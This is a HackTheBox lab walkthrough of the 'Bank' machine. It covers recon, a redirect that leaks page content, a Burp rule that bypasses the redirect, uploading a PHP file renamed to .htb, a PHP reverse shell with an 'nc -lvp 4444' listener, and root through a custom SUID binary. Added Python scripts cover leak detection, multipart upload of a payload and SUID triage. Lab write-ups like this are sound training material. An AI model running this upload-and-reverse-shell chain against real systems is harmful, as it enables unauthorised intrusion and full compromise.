Bank HackTheBox Notes

Genius = https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/

IP address: 10.10.10.29

Recon

nmap -v -sU -sS -p- -A -T4 10.10.10.29

Port 80/tcp – http

nmap -p 80 -sV 10.10.10.29

Reveals Apache httpd 2.4.7 (Ubuntu) – nothing directly exploitable in that version for our purposes

Default Ubuntu Apache2 page

Port 53/tcp – DNS

nmap -p 53 -sV 10.10.10.29

ISC BIND 9.9.5-3ubuntu0.14

Port 22/tcp – ssh

nmap -p 22 -sV 10.10.10.29

OpenSSH 6.6.1p1

Continuing

I had to cheat on this one because I don’t have the patience for this guessing crap. The accessible host on port 80 can be found at http://bank.htb.

Running dirbuster against http://bank.htb:80/ (with bank.htb pointed at 10.10.10.29 in /etc/hosts) we find the following:

Path           Response code   Response size
/uploads/      301             518
/inc/          301             516
/index.php     302             7654
/login.php     200             2307
/support.php   302             3623
/icons/        301             510
/logout.php    302             329

Response codes:

301 moved permanently (a permanent redirect; Apache answers this way when a directory such as /uploads is requested without its trailing slash), not "unauthorized"

302 found, i.e. a temporary redirect (here, to the login page)

200 OK, the request succeeded

Looking at login.php there is nothing extraordinary. However, support.php and index.php both answer with a 302, and the sizes of those redirect responses are far from equal: the three 302 responses are 7654, 3623 and 329 bytes. The 329-byte one (logout.php) is what a bare redirect looks like; the other two are whole pages. A redirect of several kilobytes means the server built the page and then appended the redirect; the usual cause in PHP is a header('Location: ...') call with no exit after it, so the access check only hides the content from clients that obey the Location header. Using Burp Suite or any other redirect blocker to rewrite the status to 200 we can see the page presented before the redirect. support.php provides an interesting page.

Burp Suite match/replace rule used to remove the automatic redirect (Proxy > Options > Match and Replace):

Type: Response header
Match (regex): 30[12] Found
Replace: 200 OK
Comment: no redirect

With the status line rewritten to 200 OK the browser renders the body it received instead of following the Location header.
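To show why the oversized 302 is a leak, here is an added example (my own code, not part of the write-up or of the bank.htb application): a constructed stand-in for support.php that sends a Location header but still writes the full page, the way PHP does when header('Location: ...') is not followed by exit(), together with a client that never follows redirects and flags any redirect whose body is big enough to be a rendered page. The page content, the /support.php and /logout.php paths and the 1024-byte threshold are assumptions chosen for the demo.

```python
"""Added example (not from the write-up): a redirect that leaks the page it
is meant to hide, and a check that spots it without Burp.

LeakyHandler is a constructed stand-in for support.php. It sends a
Location header but still writes the whole page body. A browser obeys the
redirect and never shows that body; http.client never follows redirects,
so it reads exactly what the server sent.
"""
import threading
from http.client import HTTPConnection
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed page content standing in for the real support page (~2 KB).
SECRET_PAGE = (
    b"<html><body><h1>Support</h1>\n"
    b"<!-- constructed comment: .htb uploads are handled as PHP -->\n"
    b'<form method="post" enctype="multipart/form-data" action="support.php">\n'
    b'<input type="file" name="fileToUpload"><input type="submit"></form>\n<table>\n'
    + b"".join(b"<tr><td>ticket %d</td><td>open</td></tr>\n" % i for i in range(40))
    + b"</table></body></html>\n"
)


class LeakyHandler(BaseHTTPRequestHandler):
    def _redirect(self, body):
        """302 to the login page, carrying whatever body we are handed."""
        self.send_response(302)
        self.send_header("Location", "/login.php")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        if self.path == "/support.php":
            self._redirect(SECRET_PAGE)  # vulnerable: page rendered, then redirected
        elif self.path == "/logout.php":
            self._redirect(b"")          # correct: bare redirect, nothing to leak
        else:
            self.send_response(404)
            self.send_header("Content-Length", "0")
            self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_server():
    """Serve LeakyHandler on an ephemeral loopback port in a background thread."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), LeakyHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch_without_redirect(host, port, path):
    """Return (status, Location header, body) for one GET, never following redirects."""
    conn = HTTPConnection(host, port, timeout=5)
    conn.request("GET", path)
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    return resp.status, resp.getheader("Location"), body


def leaky_redirects(host, port, paths, min_body=1024):
    """Map path -> (location, body) for redirects whose body looks like a full page.

    Same heuristic as comparing dirbuster's response sizes: a bare redirect
    is a few hundred bytes, a rendered page is kilobytes.
    """
    leaks = {}
    for path in paths:
        status, location, body = fetch_without_redirect(host, port, path)
        if status in (301, 302) and len(body) >= min_body:
            leaks[path] = (location, body)
    return leaks


if __name__ == "__main__":
    srv = start_server()
    port = srv.server_address[1]
    found = leaky_redirects("127.0.0.1", port, ["/support.php", "/logout.php"])
    for path, (loc, body) in found.items():
        print(f"{path}: 302 -> {loc}, but {len(body)} bytes of body came with it:")
        print(body.decode())
    srv.shutdown()
    srv.server_close()
```

Against a real target the same fetch_without_redirect call pointed at bank.htb does what the Burp rule does, only without rewriting anything: the body is already there, the browser just never shows it.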

Now we can read index.php and support.php properly. The support page lets us upload files, so this is likely our way in. A note in the page source states that we can upload PHP files if we give them the .htb extension, i.e. the server runs .htb files as PHP, so a PHP payload only has to be renamed.

I personally used the following reverse shell, http://pentestmonkey.net/tools/web-shells/php-reverse-shell, followed by the command nc -lvp 4444. This gives us a shell as www-data, which can be used to read the user.txt file.
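For anyone who wants to script the upload rather than click through the form, here is an added example (my own code, not from the write-up): it renames a PHP payload to the .htb extension the server executes and hand-builds the multipart/form-data POST. The form field name fileToUpload, the POST target /support.php and the assumption that uploads are then reachable under /uploads/ are guesses for illustration; read them off the real page source. The payload is a constructed one-line PHP probe, not the pentestmonkey shell; swap the real reverse shell into PAYLOAD and rename it the same way.

```python
"""Added example (not from the write-up): uploading a renamed PHP file.

Assumptions: form field 'fileToUpload', form posts to /support.php, files
are served from /uploads/. The payload is a constructed probe.
"""
import os
import uuid
from http.client import HTTPConnection

# Constructed probe: prints the web server's uid and kernel if it ran as PHP.
PAYLOAD = b"<?php echo 'uid=' . getmyuid() . ' ' . php_uname(); ?>\n"


def rename_for_execution(filename, exec_ext=".htb"):
    """shell.php -> shell.htb: keep the name, use the extension the server runs as PHP."""
    stem, _ = os.path.splitext(filename)
    return stem + exec_ext


def build_multipart(field, filename, content, content_type="application/octet-stream", boundary=None):
    """Return (Content-Type header value, body bytes) for a single-file multipart POST.

    content_type is what the browser would send for the file; some upload
    filters look at it, so it is a parameter rather than a constant.
    """
    boundary = boundary or uuid.uuid4().hex
    body = b"".join([
        b"--" + boundary.encode() + b"\r\n",
        b'Content-Disposition: form-data; name="%s"; filename="%s"\r\n'
        % (field.encode(), filename.encode()),
        b"Content-Type: %s\r\n\r\n" % content_type.encode(),
        content + b"\r\n",
        b"--" + boundary.encode() + b"--\r\n",
    ])
    return "multipart/form-data; boundary=" + boundary, body


def upload(host, path, field, filename, content, port=80, cookie=None):
    """POST the file and return (status, response body). cookie: session cookie if the form is behind a login."""
    ctype, body = build_multipart(field, filename, content)
    headers = {"Host": host, "Content-Type": ctype, "Content-Length": str(len(body))}
    if cookie:
        headers["Cookie"] = cookie
    conn = HTTPConnection(host, port, timeout=10)
    conn.request("POST", path, body=body, headers=headers)
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    return resp.status, data


if __name__ == "__main__":
    name = rename_for_execution("shell.php")  # -> shell.htb
    status, data = upload("bank.htb", "/support.php", "fileToUpload", name, PAYLOAD)
    print(status, data[:200])
    # Assumed location of the uploaded file: http://bank.htb/uploads/shell.htb
    # (start nc -lvp 4444 first if PAYLOAD is the reverse shell).
```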

Using “find / -user root -perm -4000 -print 2>/dev/null” we can list root-owned files with the SUID bit set, i.e. programs that run with root privileges no matter who executes them, which makes any non-standard one a potential privilege escalation.

find / -user root -perm -4000 -print 2>/dev/null
/var/htb/bin/emergency
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/mtr
/usr/sbin/pppd
/bin/ping
/bin/ping6
/bin/su
/bin/fusermount
/bin/mount
/bin/umount

The first one that sticks out is /var/htb/bin/emergency: everything else is a stock Ubuntu binary under /bin, /usr/bin, /usr/sbin or /usr/lib, while this one lives in a custom path. It is worth a quick ls -l, file and strings on an unknown SUID binary before running it; here it simply spawns a shell, and executing it gives us a root shell.
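The triage above (ignore what the distribution ships SUID, look hard at anything else) is easy to automate. The following is an added example, my own code and not part of the write-up: it parses the find output, flags binaries outside the normal system directories or absent from a hand-written allow list, and on a live host can confirm that a flagged path really is root-owned and SUID. The sample input is the list above re-typed; the STOCK_SUID allow list is my assumption about what Ubuntu 14.04 ships, not something the write-up states.

```python
"""Added example (not from the write-up): triaging 'find / -perm -4000' output."""
import os
import stat

# Sample input: the write-up's find output, re-typed here as constructed data.
SUID_OUTPUT = """\
/var/htb/bin/emergency
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/mtr
/usr/sbin/pppd
/bin/ping
/bin/ping6
/bin/su
/bin/fusermount
/bin/mount
/bin/umount
"""

# Where a distribution-installed SUID binary is expected to live.
SYSTEM_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")

# Assumed allow list of binaries a stock Ubuntu 14.04 ships SUID (by basename).
STOCK_SUID = {
    "dmcrypt-get-device", "ssh-keysign", "dbus-daemon-launch-helper",
    "polkit-agent-helper-1", "chsh", "passwd", "chfn", "pkexec", "newgrp",
    "traceroute6.iputils", "gpasswd", "sudo", "mtr", "pppd", "ping", "ping6",
    "su", "fusermount", "mount", "umount",
}


def parse_find_output(text):
    """One path per non-empty line; the echoed command line (if any) is skipped."""
    paths = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("/"):
            paths.append(line)
    return paths


def classify(path):
    """Return a reason string if the SUID binary deserves attention, else None."""
    if not path.startswith(SYSTEM_DIRS):
        return "outside standard system directories"
    if os.path.basename(path) not in STOCK_SUID:
        return "not in the stock SUID allow list"
    return None


def triage(text):
    """Map each suspicious path from the find output to the reason it was flagged."""
    findings = {}
    for path in parse_find_output(text):
        reason = classify(path)
        if reason:
            findings[path] = reason
    return findings


def is_root_suid(path):
    """On a live host: True only if the file exists, is owned by uid 0 and has the SUID bit."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return st.st_uid == 0 and bool(st.st_mode & stat.S_ISUID)


if __name__ == "__main__":
    for path, reason in triage(SUID_OUTPUT).items():
        live = "confirmed root SUID" if is_root_suid(path) else "not present on this host"
        print(f"{path}: {reason} ({live})")
```

The allow-list check is only as good as the baseline; on a real engagement build STOCK_SUID from a clean install of the same release rather than from memory, and treat anything in it that has a published local privilege escalation as a finding too.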
